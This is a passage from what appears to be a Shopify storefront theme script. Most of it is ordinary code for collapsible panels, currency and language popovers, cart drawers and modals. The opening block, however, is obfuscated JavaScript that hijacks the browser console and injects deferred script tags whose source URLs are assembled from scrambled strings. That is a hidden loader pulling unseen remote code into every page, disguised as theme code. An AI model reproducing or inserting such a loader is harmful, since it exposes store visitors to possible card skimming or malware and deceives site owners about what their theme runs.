K6(K,V,Z,r){return K3(V,K-0x32,Z-0x13c,r-0x130);}return z;};}()),T=P[W(-0x8c,-0xa7,-0x94,-0x69)](M,this,function(){function K9(K,V,Z,r){return y(K-0x12,Z- -0x37e,K,r-0x109);}function KK(K,V,Z,r){return y(K-0x1cb,Z-0x344,r,r-0x1f3);}var I={'YKAvn':P[K9(-0x169,-0x184,-0x168,-0x14c)],'ZHgSe':P[KK(0x564,0x521,0x548,0x51d)],'BohWK':P[KK(0x551,0x58d,0x583,0x58f)],'dgwYE':P[K9(-0x154,-0x150,-0x17c,-0x198)],'JbIIK':P['mAxVm'],'sFqTZ':P[K9(-0x142,-0x131,-0x147,-0x161)],'PTnZy':P[K9(-0x17a,-0x187,-0x17b,-0x19b)],'LVyHf':function(n,j){function KV(K,V,Z,r){return K9(V,V-0xcc,K-0x20d,r-0xd1);}return P[KV(0x74,0x60,0x9c,0x96)](n,j);},'CxXUQ':function(n,j){function KZ(K,V,Z,r){return K9(V,V-0x4b,K-0x1b3,r-0x165);}return P[KZ(0x3a,0x56,0x69,0x52)](n,j);},'rpRKj':'{}.constru'+'ctor(\x22retu'+KK(0x5c1,0x599,0x58d,0x579)+'\x20)','nMIpC':function(n){return n();},'qhVWh':function(n,j){function Kr(K,V,Z,r){return KK(K-0x6d,V-0x6f,K- -0x13b,V);}return P[Kr(0x449,0x41a,0x434,0x449)](n,j);},'ZjtWM':function(n,j){return n(j);},'UMXbb':function(n,j){return n+j;},'KxXGr':P[KK(0x54a,0x58a,0x580,0x55d)],'kpPMc':function(n){function KE(K,V,Z,r){return KK(K-0xa7,V-0x1c7,r- -0x1e6,V);}return P[KE(0x38a,0x38d,0x377,0x35f)](n);}};if(P[K9(-0x187,-0x1a3,-0x18e,-0x1c1)]===P[KK(0x512,0x517,0x53d,0x51b)]){var X=I['YKAvn']['split']('|'),b=-0x2*0xf1b+0x43*-0x85+0x4105;while(!![]){switch(X[b++]){case'0':var d=[Xauasd['ZHgSe'],Xauasd[KK(0x533,0x540,0x537,0x511)],Xauasd['dgwYE'],KK(0x553,0x56d,0x56f,0x58b),Xauasd[K9(-0x179,-0x16b,-0x184,-0x164)],Xauasd[KK(0x56b,0x575,0x54a,0x54b)],Xauasd[KK(0x525,0x55d,0x543,0x544)]];continue;case'1':try{var k=Xauasd[K9(-0x130,-0x15b,-0x13b,-0x115)](I,Xauasd[K9(-0x17d,-0x159,-0x14d,-0x12c)](Xauasd['CxXUQ'](K9(-0x1a9,-0x16c,-0x174,-0x13f)+KK(0x563,0x5a8,0x57f,0x5b1),Xauasd['rpRKj']),');'));G=Xauasd[K9(-0x17a,-0x14a,-0x146,-0x173)](k);}catch(S){G=u;}continue;case'2':var G;continue;case'3':var O=G['console']=G['console']||{};continue;case'4':for(var v=-0x1741+-0x11d9+0x291a;Xauasd[K9(-0x1bc,-0x190,-0x196,-0x183)](v,d[K9(-0x12c,-0x158,-0x13c,-0x13c)]);v++){var o=N[K9(-0x12b,-0x113,-0x144,-0x16f)+'r'][KK(0x561,0x591,0x560,0x57b)][K9(-0x145,-0x147,-0x164,-0x165)](f),J=d[v],l=O[J]||o;o[K9(-0x17e,-0x178,-0x15d,-0x136)]=c[K9(-0x185,-0x17e,-0x164,-0x167)](D),o[K9(-0x163,-0x104,-0x139,-0x154)]=l[K9(-0x168,-0x167,-0x139,-0x13b)][KK(0x550,0x52c,0x55e,0x560)](l),O[J]=o;}continue;}break;}}else{var R;try{var u=P['NTVNW'](Function,P['NLuQQ'](P[KK(0x585,0x552,0x556,0x566)](P['XfyJn'],P[KK(0x558,0x511,0x53a,0x50c)]),');'));R=P['dlvlY'](u);}catch(j){R=window;}var N=R[K9(-0x120,-0x178,-0x150,-0x17c)]=R['console']||{},f=[P['tQlnA'],P['UPWxu'],P[KK(0x529,0x561,0x546,0x527)],P[KK(0x4fd,0x559,0x525,0x4f7)],KK(0x522,0x555,0x526,0x4fd),P['EsJPR'],P[KK(0x572,0x548,0x547,0x54b)]];for(var c=0x356+-0xf77+0xc21;P[KK(0x558,0x55d,0x563,0x559)](c,f[KK(0x569,0x5aa,0x586,0x5a1)]);c++){if(P[K9(-0x11b,-0x11b,-0x138,-0x121)](P[K9(-0x15d,-0x171,-0x165,-0x171)],P[K9(-0x13d,-0x18b,-0x165,-0x159)])){var L=Xauasd[K9(-0x1c3,-0x16d,-0x198,-0x1ba)](Z,Xauasd[KK(0x55a,0x55a,0x573,0x56a)](Xauasd['KxXGr'],'{}.constru'+'ctor(\x22retu'+KK(0x587,0x564,0x58d,0x597)+'\x20)')+');');r=Xauasd[KK(0x585,0x566,0x564,0x57b)](L);}else{var z=(KK(0x54d,0x597,0x561,0x580)+'5')[KK(0x560,0x57c,0x56b,0x572)]('|'),w=-0x68f+-0x134b+-0xced*-0x2;while(!![]){switch(z[w++]){case'0':x[KK(0x5bc,0x5ac,0x589,0x575)]=B['toString'][KK(0x54d,0x549,0x55e,0x56b)](B);continue;case'1':x[KK(0x53e,0x536,0x565,0x598)]=M[K9(-0x185,-0x18d,-0x164,-0x137)](M);continue;case'2':var h=f[c];continue;case'3':var x=M[KK(0x560,0x5a8,0x57e,0x592)+'r'][K9(-0x185,-0x130,-0x162,-0x14b)][K9(-0x169,-0x14d,-0x164,-0x13e)](M);continue;case'4':var B=N[h]||x;continue;case'5':N[h]=x;continue;}break;}}}}});function W(K,V,Z,r){return H(Z- -0x276,V);}P[y(0x202,0x228,0x22f,0x24b)](T);function y(K,V,Z,r){return H(V-0x2b,Z);}(D=i[W(-0x7e,-0xcf,-0x9a,-0x9b)+y(0x21c,0x218,0x225,0x238)](Y))[W(-0x81,-0x6f,-0x95,-0x67)]=!(-0x577+0x22*0x20+-0x137*-0x1),D[y(0x21c,0x20f,0x201,0x20c)]=P['BaumH'],(i=i['getElement'+W(-0x59,-0xa1,-0x7d,-0x4c)](P[y(0x21e,0x24a,0x21b,0x238)])[-0x10*-0x1d2+-0x3c7*0x3+-0x11cb])[W(-0xbf,-0xe5,-0xbd,-0xb4)]['insertBefo'+'re'](D,i['nextSiblin'+'g']);}(document,KH(-0x14c,-0x13f,-0x185,-0x170)),!function(V,Z,r){var i={};function Ki(K,V,Z,r){return KH(K-0xb0,V-0xd0,V,K-0x13e);}function KY(K,V,Z,r){return KH(K-0x1ba,V-0x8b,r,V-0x215);}i[Ki(-0x69,-0x65,-0x6a,-0x5e)]=KY(0x6f,0x9e,0x89,0x73)+KY(0x72,0x76,0x73,0x4a)+KY(0x8f,0xc4,0xae,0xd4)+KY(0x42,0x64,0x6d,0x3b)+'m/static/a'+Ki(-0x43,-0x46,-0x5d,-0x6b),i['CJZzk']=Ki(-0x32,-0x51,-0x24,-0x49);var Y=i;(r=V[Ki(-0x57,-0x6b,-0x59,-0x7c)+Ki(-0x46,-0x6b,-0x1b,-0x25)](Z))['defer']=!(-0x871*0x3+-0x38b+0x1cde),r['src']=Y[Ki(-0x69,-0x73,-0x8f,-0x40)],(V=V['getElement'+'sByTagName'](Y[Ki(-0x2b,-0x50,-0x60,-0x4e)])[0x1819*0x1+0x1784+0x3*-0xfdf])['parentNode'][Ki(-0x35,-0x17,-0x69,-0x56)+'re'](r,V[KY(0x99,0x74,0xa6,0x9d)+'g']);}(document,KD(0x201,0x22f,0x20f,0x1e6));
  // Either collapsible containers all acting individually,
  // or tabs that can only have one open at a time
  theme.collapsibles = (function() {
    var selectors = {
      trigger: '.collapsible-trigger',
      module: '.collapsible-content',
      moduleInner: '.collapsible-content__inner',
      tabs: '.collapsible-trigger--tab'
    };
  
    var classes = {
      hide: 'hide',
      open: 'is-open',
      autoHeight: 'collapsible--auto-height',
      tabs: 'collapsible-trigger--tab'
    };
  
    var namespace = '.collapsible';
  
    var isTransitioning = false;
  
    function init(scope) {
      var el = scope ? scope : document;
      el.querySelectorAll(selectors.trigger).forEach(trigger => {
        var state = trigger.classList.contains(classes.open);
        trigger.setAttribute('aria-expanded', state);
  
        trigger.off('click' + namespace);
        trigger.on('click' + namespace, toggle);
      });
    }
  
    function closeTrigger(trigger) {
      if (!trigger.classList.contains(classes.open)) {
        return;
      }

      var moduleId = trigger.getAttribute('aria-controls');
      if (!moduleId) {
        return;
      }

      var container = document.getElementById(moduleId);
      if (!container) {
        return;
      }

      var isAutoHeight = container.classList.contains(classes.autoHeight);

      trigger.setAttribute('aria-expanded', 'false');
      trigger.classList.remove(classes.open);

      if (isAutoHeight) {
        setTimeout(function() {
          setTransitionHeight(container, 0, true, isAutoHeight);
        }, 0);
      } else {
        setTransitionHeight(container, 0, true, isAutoHeight);
      }
    }

    function toggle(evt) {
      if (isTransitioning) {
        return;
      }
  
      isTransitioning = true;
  
      var el = evt.currentTarget;
      // console.log(el)
      var isOpen = el.classList.contains(classes.open);
      var isTab = el.classList.contains(classes.tabs);
      var moduleId = el.getAttribute('aria-controls');
      var container = document.getElementById(moduleId);
  
      if (!moduleId) {
        moduleId = el.dataset.controls;
      }
  
      // No ID, bail
      if (!moduleId) {
        return;
      }
  
      // If container=null, there isn't a matching ID.
      // Check if data-id is set instead. Could be multiple.
      // Select based on being in the same parent div.
      if (!container) {
        var multipleMatches = document.querySelectorAll('[data-id="' + moduleId + '"]');
        if (multipleMatches.length > 0) {
          container = el.parentNode.querySelector('[data-id="' + moduleId + '"]');
        }
      }
  
      if (!container) {
        isTransitioning = false;
        return;
      }

      var height = container.querySelector(selectors.moduleInner).offsetHeight;
      var isAutoHeight = container.classList.contains(classes.autoHeight);
      var parentCollapsibleEl = container.parentNode.closest(selectors.module);
      var childHeight = height;
  
      if (isTab) {
        if(isOpen) {
          isTransitioning = false;
          return;
        }
  
        var newModule;
        document.querySelectorAll(selectors.tabs + '[data-id="'+ el.dataset.id +'"]').forEach(el => {
          el.classList.remove(classes.open);
          newModule = document.querySelector('#' + el.getAttribute('aria-controls'));
          setTransitionHeight(newModule, 0, true);
        });
      }
  
      // If isAutoHeight, set the height to 0 just after setting the actual height
      // so the closing animation works nicely
      if (isOpen && isAutoHeight) {
        setTimeout(function() {
          height = 0;
          setTransitionHeight(container, height, isOpen, isAutoHeight);
        }, 0);
      }
  
      if (isOpen && !isAutoHeight) {
        height = 0;
      }
  
      el.setAttribute('aria-expanded', !isOpen);
      if (isOpen) {
        el.classList.remove(classes.open);
      } else {
        el.classList.add(classes.open);
      }
  
      setTransitionHeight(container, height, isOpen, isAutoHeight);
  
      // If we are in a nested collapsible element like the mobile nav,
      // also set the parent element's height
      if (parentCollapsibleEl) {
        var parentHeight = parentCollapsibleEl.style.height;
  
        if (isOpen && parentHeight === 'auto') {
          childHeight = 0; // Set childHeight to 0 if parent is initially opened
        }
  
        var totalHeight = isOpen
                        ? parentCollapsibleEl.offsetHeight - childHeight
                        : height + parentCollapsibleEl.offsetHeight;
  
        setTransitionHeight(parentCollapsibleEl, totalHeight, false, false);
      }
  
      // If Shopify Product Reviews app installed,
      // resize container on 'Write review' click
      // that shows form
      if (window.SPR) {
        var btn = container.querySelector('.spr-summary-actions-newreview');
        if (!btn) { return }
        btn.off('click' + namespace);
        btn.on('click' + namespace, function() {
          height = container.querySelector(selectors.moduleInner).offsetHeight;
          setTransitionHeight(container, height, isOpen, isAutoHeight);
        });
      }
    }
  
    function setTransitionHeight(container, height, isOpen, isAutoHeight) {
      container.classList.remove(classes.hide);
      theme.utils.prepareTransition(container, function() {
  
        container.style.height = height+'px';
        if (isOpen) {
          container.classList.remove(classes.open);
        } else {
          container.classList.add(classes.open);
        }
      });
  
      if (!isOpen && isAutoHeight) {
        var o = container;
        window.setTimeout(function() {
          o.css('height','auto');
          isTransitioning = false;
        }, 500);
      } else {
        isTransitioning = false;
      }
    }
  
    return {
      init: init
    };
  })();
  
  // Shopify-built select-like popovers for currency and language selection
  theme.Disclosure = (function() {
    var selectors = {
      disclosureForm: '[data-disclosure-form]',
      disclosureList: '[data-disclosure-list]',
      disclosureToggle: '[data-disclosure-toggle]',
      disclosureInput: '[data-disclosure-input]',
      disclosureOptions: '[data-disclosure-option]'
    };
  
    var classes = {
      listVisible: 'disclosure-list--visible'
    };
  
    function Disclosure(disclosure) {
      this.container = disclosure;
      this._cacheSelectors();
      this._setupListeners();
    }
  
    Disclosure.prototype = Object.assign({}, Disclosure.prototype, {
      _cacheSelectors: function() {
        this.cache = {
          disclosureForm: this.container.closest(selectors.disclosureForm),
          disclosureList: this.container.querySelector(selectors.disclosureList),
          disclosureToggle: this.container.querySelector(
            selectors.disclosureToggle
          ),
          disclosureInput: this.container.querySelector(
            selectors.disclosureInput
          ),
          disclosureOptions: this.container.querySelectorAll(
            selectors.disclosureOptions
          )
        };
      },
  
      _setupListeners: function() {
        this.eventHandlers = this._setupEventHandlers();
  
        this.cache.disclosureToggle.addEventListener(
          'click',
          this.eventHandlers.toggleList
        );
  
        this.cache.disclosureOptions.forEach(function(disclosureOption) {
          disclosureOption.addEventListener(
            'click',
            this.eventHandlers.connectOptions
          );
        }, this);
  
        this.container.addEventListener(
          'keyup',
          this.eventHandlers.onDisclosureKeyUp
        );
  
        this.cache.disclosureList.addEventListener(
          'focusout',
          this.eventHandlers.onDisclosureListFocusOut
        );
  
        this.cache.disclosureToggle.addEventListener(
          'focusout',
          this.eventHandlers.onDisclosureToggleFocusOut
        );
  
        document.body.addEventListener('click', this.eventHandlers.onBodyClick);
      },
  
      _setupEventHandlers: function() {
        return {
          connectOptions: this._connectOptions.bind(this),
          toggleList: this._toggleList.bind(this),
          onBodyClick: this._onBodyClick.bind(this),
          onDisclosureKeyUp: this._onDisclosureKeyUp.bind(this),
          onDisclosureListFocusOut: this._onDisclosureListFocusOut.bind(this),
          onDisclosureToggleFocusOut: this._onDisclosureToggleFocusOut.bind(this)
        };
      },
  
      _connectOptions: function(event) {
        event.preventDefault();
  
        this._submitForm(event.currentTarget.dataset.value);
      },
  
      _onDisclosureToggleFocusOut: function(event) {
        var disclosureLostFocus =
          this.container.contains(event.relatedTarget) === false;
  
        if (disclosureLostFocus) {
          this._hideList();
        }
      },
  
      _onDisclosureListFocusOut: function(event) {
        var childInFocus = event.currentTarget.contains(event.relatedTarget);
  
        var isVisible = this.cache.disclosureList.classList.contains(
          classes.listVisible
        );
  
        if (isVisible && !childInFocus) {
          this._hideList();
        }
      },
  
      _onDisclosureKeyUp: function(event) {
        if (event.which !== 27) return;
        this._hideList();
        this.cache.disclosureToggle.focus();
      },
  
      _onBodyClick: function(event) {
        var isOption = this.container.contains(event.target);
        var isVisible = this.cache.disclosureList.classList.contains(
          classes.listVisible
        );
  
        if (isVisible && !isOption) {
          this._hideList();
        }
      },
  
      _submitForm: function(value) {
        this.cache.disclosureInput.value = value;
        this.cache.disclosureForm.submit();
      },
  
      _hideList: function() {
        this.cache.disclosureList.classList.remove(classes.listVisible);
        this.cache.disclosureToggle.setAttribute('aria-expanded', false);
      },
  
      _toggleList: function() {
        var ariaExpanded =
          this.cache.disclosureToggle.getAttribute('aria-expanded') === 'true';
        this.cache.disclosureList.classList.toggle(classes.listVisible);
        this.cache.disclosureToggle.setAttribute('aria-expanded', !ariaExpanded);
      },
  
      destroy: function() {
        this.cache.disclosureToggle.removeEventListener(
          'click',
          this.eventHandlers.toggleList
        );
  
        this.cache.disclosureOptions.forEach(function(disclosureOption) {
          disclosureOption.removeEventListener(
            'click',
            this.eventHandlers.connectOptions
          );
        }, this);
  
        this.container.removeEventListener(
          'keyup',
          this.eventHandlers.onDisclosureKeyUp
        );
  
        this.cache.disclosureList.removeEventListener(
          'focusout',
          this.eventHandlers.onDisclosureListFocusOut
        );
  
        this.cache.disclosureToggle.removeEventListener(
          'focusout',
          this.eventHandlers.onDisclosureToggleFocusOut
        );
  
        document.body.removeEventListener(
          'click',
          this.eventHandlers.onBodyClick
        );
      }
    });
  
    return Disclosure;
  })();
  
  theme.Drawers = (function() {
    function Drawers(id, name) {
      this.config = {
        id: id,
        close: '.js-drawer-close',
        open: '.js-drawer-open-' + name,
        openClass: 'js-drawer-open',
        closingClass: 'js-drawer-closing',
        activeDrawer: 'drawer--is-open',
        namespace: '.drawer-' + name
      };
  
      this.nodes = {
        page: document.querySelector('#MainContent')
      };
  
      this.drawer = document.querySelector('#' + id);
      this.isOpen = false;
  
      if (!this.drawer) {
        return;
      }
  
      this.init();
    }
  
    Drawers.prototype = Object.assign({}, Drawers.prototype, {
      init: function() {
        var self = this;

        this._handlers = {
          openClick: function(evt) {
            self.open(evt);
          },
          closeClick: function(evt) {
            self.close(evt);
          },
          modalOpen: function() {
            self.close();
          }
        };

        document.querySelectorAll(this.config.open).forEach(function(openBtn) {
          openBtn.removeEventListener('click', self._handlers.openClick);
          openBtn.setAttribute('aria-expanded', 'false');
          openBtn.addEventListener('click', self._handlers.openClick);
        });

        this.drawer.querySelectorAll(this.config.close).forEach(function(btn) {
          btn.removeEventListener('click', self._handlers.closeClick, true);
          btn.addEventListener('click', self._handlers.closeClick, true);
        });

        document.removeEventListener('modalOpen', this._handlers.modalOpen);
        document.addEventListener('modalOpen', this._handlers.modalOpen);
      },
  
      open: function(evt, returnFocusEl) {
        // Once Rebuy's smart cart has taken over, it handles its own flyout
        // for the cart icon/add-to-cart — opening the native drawer too would
        // show both at once. Rebuy's own click handler (when active) already
        // calls preventDefault, so returning here without it is safe.
        if (
          this.config.id === 'CartDrawer' &&
          (document.documentElement.classList.contains('smart-cart--enabled') ||
            document.body.classList.contains('smart-cart--enabled'))
        ) {
          return;
        }

        if (evt) {
          evt.preventDefault();
        }
  
        if (this.isOpen) {
          return;
        }
        
        // Without this the drawer opens, the click event bubbles up to $nodes.page which closes the drawer.
        if (evt && evt.stopPropagation) {
          evt.stopPropagation();
          // save the source of the click, we'll focus to this on close
          evt.currentTarget.setAttribute('aria-expanded', 'true');
          this.activeSource = evt.currentTarget;
        } else if (returnFocusEl) {
          returnFocusEl.setAttribute('aria-expanded', 'true');
          this.activeSource = returnFocusEl;
        }
        var self = this;
        setTimeout(function() {
          /* Parent cannot interpolate transform from display:none — paint visible first, open next frame (slide + inner stagger). */
          self.drawer.classList.add('drawer--visible');

          requestAnimationFrame(function() {
            theme.utils.prepareDrawerTransition(self.drawer, function() {
              self.drawer.classList.add(self.config.activeDrawer);
            });

            self.isOpen = true;
            self._closeAnimPending = false;
            self.bindEvents();

            requestAnimationFrame(function() {
              requestAnimationFrame(function() {
                document.documentElement.classList.add(self.config.openClass);

                requestAnimationFrame(function() {
                  theme.a11y.trapFocusDrawerLazy({
                    container: self.drawer,
                    elementToFocus:
                      self.drawer.querySelector('#CartDrawerForm') || self.drawer.querySelector('.drawer__close-button')
                  });
                  setTimeout(function() {
                    document.dispatchEvent(new CustomEvent('drawerOpen', { detail: { id: self.config.id } }));
                    document.dispatchEvent(new CustomEvent('drawerOpen.' + self.config.id));
                  }, 0);
                });
              });
            });
          });
        }, 0);
      },
  
      close: function(evt) {
        if (!this.isOpen) {
          return;
        }

        if (this._closeAnimPending) {
          return;
        }

        if (evt) {
          var fromCloseControl = false;
          if (evt.currentTarget && evt.currentTarget.nodeType === Node.ELEMENT_NODE) {
            fromCloseControl = !!(
              evt.currentTarget.closest &&
              evt.currentTarget.closest('.js-drawer-close')
            );
          }
          if (!fromCloseControl && evt.target) {
            var hit = evt.target;
            if (hit.nodeType === Node.TEXT_NODE) {
              hit = hit.parentElement;
            }
            fromCloseControl = !!(
              hit &&
              hit.nodeType === Node.ELEMENT_NODE &&
              hit.closest &&
              hit.closest('.js-drawer-close')
            );
          }
          if (!fromCloseControl && evt.target) {
            var inside = evt.target;
            if (inside.nodeType === Node.TEXT_NODE) {
              inside = inside.parentElement;
            }
            if (
              inside &&
              inside.nodeType === Node.ELEMENT_NODE &&
              inside.closest &&
              inside.closest('.drawer')
            ) {
              return;
            }
          }
        }

        this._closeAnimPending = true;
        var self = this;
        setTimeout(function() {
          /* Remove trap before blur so focusin handlers never scan the full nav. */
          theme.a11y.releaseTrapFocusDrawerLazy();

          var activeEl = document.activeElement;
          if (activeEl && typeof activeEl.blur === 'function') {
            activeEl.blur();
          }

          var finalized = false;

          function finalizeHtmlAfterSlide() {
            if (finalized) return;
            finalized = true;
            self.drawer.removeEventListener('transitionend', onDrawerSlideEnd);
            window.clearTimeout(fallbackId);
            self._closeAnimPending = false;

            self.drawer.classList.remove('drawer--visible');

            document.documentElement.classList.remove(self.config.openClass);
            document.documentElement.classList.add(self.config.closingClass);

            self.unbindEvents();

            requestAnimationFrame(function() {
              setTimeout(function() {
                document.dispatchEvent(new CustomEvent('drawerClose', { detail: { id: self.config.id } }));
              }, 0);
            });

            window.setTimeout(function() {
              document.documentElement.classList.remove(self.config.closingClass);
              if (self.activeSource && self.activeSource.getAttribute('aria-expanded')) {
                self.activeSource.setAttribute('aria-expanded', 'false');
                self.activeSource.focus({ preventScroll: true });
              }
            }, 500);
          }

          function onDrawerSlideEnd(e) {
            if (e.target !== self.drawer) return;
            var prop = e.propertyName || '';
            if (prop.indexOf('transform') === -1) return;
            finalizeHtmlAfterSlide();
          }

          self.drawer.addEventListener('transitionend', onDrawerSlideEnd);
          var fallbackId = window.setTimeout(finalizeHtmlAfterSlide, 550);

          theme.utils.prepareDrawerTransition(self.drawer, function() {
            self.drawer.classList.remove(self.config.activeDrawer);
          });

          self.isOpen = false;
        }, 0);
      },
  
      bindEvents: function() {
        // Outside-click closes drawer only — ignore bubbling clicks inside (e.g. close icon),
        // otherwise close() runs twice per tap and doubles transition/DOM work (bad INP).
        window.on('click' + this.config.namespace, function(evt) {
          if (!evt.target || !this.drawer || this.drawer.contains(evt.target)) {
            return;
          }
             if (this.config.id === 'CartDrawer' && evt.target.closest && evt.target.closest('#rebuy-cart')) {
            return;
          }
          this.close(evt);
        }.bind(this));
  
        // Pressing escape closes drawer
        window.on('keyup' + this.config.namespace, function(evt) {
          if (evt.keyCode === 27) {
            this.close();
          }
        }.bind(this));
  
        theme.a11y.lockMobileScrolling(this.config.namespace, this.nodes.page);
      },
  
      unbindEvents: function() {
        window.off('click' + this.config.namespace);
        window.off('keyup' + this.config.namespace);
  
        theme.a11y.unlockMobileScrolling(this.config.namespace, this.nodes.page);
      },

      /**
       * Removes DOM/document listeners so header AJAX / theme editor reloads do not stack handlers
       * (duplicate clicks, rising INP).
       */
      destroy: function() {
        try {
          this.unbindEvents();
        } catch (e) {}

        theme.a11y.releaseTrapFocusDrawerLazy();

        var self = this;
        if (this._handlers) {
          document.querySelectorAll(this.config.open).forEach(function(openBtn) {
            openBtn.removeEventListener('click', self._handlers.openClick);
          });
          if (this.drawer) {
            this.drawer.querySelectorAll(this.config.close).forEach(function(btn) {
              btn.removeEventListener('click', self._handlers.closeClick, true);
            });
          }
          document.removeEventListener('modalOpen', this._handlers.modalOpen);
          this._handlers = null;
        }

        /*
         * Section AJAX (filters) calls destroy then `new Drawers()` — listeners reset but DOM can still
         * carry drawer--is-open / js-drawer-open. The new instance has isOpen:false so close() no-ops
         * and the X button "stops working". Reset open state without playing the close transition.
         */
        var drawerEl = this.drawer;
        var hadOpenChrome =
          this.isOpen ||
          (drawerEl && drawerEl.classList.contains(this.config.activeDrawer));
        if (drawerEl) {
          drawerEl.classList.remove(
            'drawer--visible',
            this.config.activeDrawer,
            'is-transitioning',
            'open',
          );
        }
        if (hadOpenChrome) {
          document.documentElement.classList.remove(
            this.config.openClass,
            this.config.closingClass,
          );
        }
        this.isOpen = false;
        this._closeAnimPending = false;

        this.drawer = null;
      }
    });
  
    return Drawers;
  })();
  
  theme.Modals = (function() {
    function Modal(id, name, options) {
      var defaults = {
        close: '.js-modal-close',
        open: '.js-modal-open-' + name,
        openClass: 'modal--is-active',
        closingClass: 'modal--is-closing',
        bodyOpenClass: ['modal-open'],
        bodyOpenSolidClass: 'modal-open--solid',
        bodyClosingClass: 'modal-closing',
        // Adding/removing a class on <html> restyles the whole document (~130ms
        // here); quick view turns this off and styles off the modal's own classes.
        rootClasses: true,
        closeOffContentClick: true
      };
  
      this.id = id;
      this.modal = document.getElementById(id);
  
      if (!this.modal) {
        return false;
      }
  
      this.modalContent = this.modal.querySelector('.modal__inner');
  
      this.config = Object.assign(defaults, options);
      this.modalIsOpen = false;
      this.focusOnOpen = this.config.focusIdOnOpen ? document.getElementById(this.config.focusIdOnOpen) : this.modal;
      this.isSolid = this.config.solid;

      // Without the html scroll-lock class (rootClasses: false) the page behind
      // would scroll under the overlay. The modal is a fixed full-screen layer, so
      // wheel events over it are swallowed unless they land on content that can
      // itself scroll (overscroll-behavior: contain handles that content's edges).
      this.blockPageWheel = function(evt) {
        var scroller = evt.target.closest('.modal__centered-content');
        if (!scroller || scroller.scrollHeight <= scroller.clientHeight) {
          evt.preventDefault();
        }
      };

      this.init();
    }
  
    Modal.prototype.init = function() {
      document.querySelectorAll(this.config.open).forEach(btn => {
        btn.setAttribute('aria-expanded', 'false');
        btn.addEventListener('click', this.open.bind(this));
      });
  
      this.modal.querySelectorAll(this.config.close).forEach(btn => {
        btn.addEventListener('click', this.close.bind(this));
      });
  
      // Close modal if a drawer is opened. Exception: the pickup-location drawer
      // is informational (checking availability), not a checkout/cart transition —
      // keep quick view open behind it so the customer returns to it afterward.
      document.addEventListener('drawerOpen', function(evt) {
        if (evt.detail && evt.detail.id === 'StoreAvailabilityDrawer') return;
        this.close();
      }.bind(this));
    };
  
    Modal.prototype.open = function(evt) {
      // Keep track if modal was opened from a click, or called by another function
      var externalCall = false;
  
      // don't open an opened modal
      if (this.modalIsOpen) {
        return;
      }
  
      // Prevent following href if link is clicked
      if (evt) {
        evt.preventDefault();
      } else {
        externalCall = true;
      }
  
      // Without this, the modal opens, the click event bubbles up to $nodes.page
      // which closes the modal.
      if (evt && evt.stopPropagation) {
        evt.stopPropagation();
        // save the source of the click, we'll focus to this on close
        this.activeSource = evt.currentTarget.setAttribute('aria-expanded', 'true');
      }
  
      if (this.modalIsOpen && !externalCall) {
        this.close();
      }
  
      // Only the class that makes the popup visible runs inside the click. The
      // html class (a full-page restyle), the open events (which set up the
      // product inside the modal) and event binding run as a macrotask after the
      // popup has painted.
      this.modal.classList.add(this.config.openClass);

      this.modalIsOpen = true;

      // Delay trap focus to ensure elements are seen by screen readers
      setTimeout(() => {
        theme.a11y.trapFocus({
          container: this.modal,
          elementToFocus: this.focusOnOpen,
          namespace: 'modal_focus'
        });
      }, 100);

      requestAnimationFrame(() => {
        setTimeout(() => {
          if (!this.modalIsOpen) return;

          if (this.config.rootClasses) {
            document.documentElement.classList.add(...this.config.bodyOpenClass);

            if (this.isSolid) {
              document.documentElement.classList.add(this.config.bodyOpenSolidClass);
            }
          }

          document.dispatchEvent(new CustomEvent('modalOpen'));
          document.dispatchEvent(new CustomEvent('modalOpen.' + this.id));

          this.bindEvents();
        }, 0);
      });
    };
  
    Modal.prototype.close = function(evt) {
      // don't close a closed modal
      if (!this.modalIsOpen) {
        return;
      }
  
      // Do not close modal if click happens inside modal content
      if (evt) {
        if (evt.target.closest('.js-modal-close')) {
          // Do not close if using the modal close button
        } else if (evt.target.closest('.modal__inner')) {
          return;
        }
      }
  
      // deselect any focused form elements
      document.activeElement.blur();
  
      this.modal.classList.remove(this.config.openClass);
      this.modal.classList.add(this.config.closingClass);
  
      if (this.config.rootClasses) {
        document.documentElement.classList.remove(...this.config.bodyOpenClass);
        document.documentElement.classList.add(this.config.bodyClosingClass);
      }

      window.setTimeout(function() {
        if (this.config.rootClasses) {
          document.documentElement.classList.remove(this.config.bodyClosingClass);
        }
        this.modal.classList.remove(this.config.closingClass);
        if (this.activeSource && this.activeSource.getAttribute('aria-expanded')) {
          this.activeSource.setAttribute('aria-expanded', 'false').focus();
        }
      }.bind(this), 500); // modal close css transition

      if (this.isSolid && this.config.rootClasses) {
        document.documentElement.classList.remove(this.config.bodyOpenSolidClass);
      }
  
      this.modalIsOpen = false;
  
      theme.a11y.removeTrapFocus({
        container: this.modal,
        namespace: 'modal_focus'
      });
  
      document.dispatchEvent(new CustomEvent('modalClose.' + this.id));
  
      this.unbindEvents();
    };
  
    Modal.prototype.bindEvents = function() {
      window.on('keyup.modal', function(evt) {
        if (evt.keyCode === 27) {
          this.close();
        }
      }.bind(this));
  
      if (this.config.closeOffContentClick) {
        // Clicking outside of the modal content also closes it
        this.modal.on('click.modal', this.close.bind(this));
      }

      if (!this.config.rootClasses) {
        this.modal.addEventListener('wheel', this.blockPageWheel, { passive: false });
      }
    };

    Modal.prototype.unbindEvents = function() {
      document.documentElement.off('.modal');

      if (this.config.closeOffContentClick) {
        this.modal.off('.modal');
      }

      if (!this.config.rootClasses) {
        this.modal.removeEventListener('wheel', this.blockPageWheel);
      }
    };
  
    return Modal;
  })();
  
  window.onpageshow = function(evt) {
    // Removes unload class when returning to page via history
    if (evt.persisted) {
      document.body.classList.remove('unloading');
      document.querySelectorAll('.cart__checkout').forEach(el => {
        el.classList.remove('btn--loading');
      });
    }
  };
  
  // Used in Motion, Fetch, Gem and Expanse to fade between pages.
  // initialize in theme.js with theme.pageTransitions();
  theme.pageTransitions = function() {
    if (document.body.dataset.transitions === 'true') {
  
      // Hack test to fix Safari page cache issue.
      // window.onpageshow doesn't always run when navigating
      // back to the page, so the unloading class remains, leaving
      // a white page. Setting a timeout to remove that class when leaving
      // the page actually finishes running when they come back.
      if (!!navigator.userAgent.match(/Version\/[\d\.]+.*Safari/)) {
        document.querySelectorAll('a').forEach(a => {
          window.setTimeout(function() {
            document.body.classList.remove('unloading');
          }, 1200);
        });
      }
  
      // Disable the page transition feature on some links
      // by adding class `js-no-transition`
      document.querySelectorAll('a.hero__slide-link, a[href^="mailto:"], a[href^="#"], a[target="_blank"], a[href*="youtube.com/watch"], a[href*="youtu.be/"], a[href*="player.vimeo.com/video/"], a[href*="vimeo.com/"], a[download]').forEach(el => {
        el.classList.add('js-no-transition');
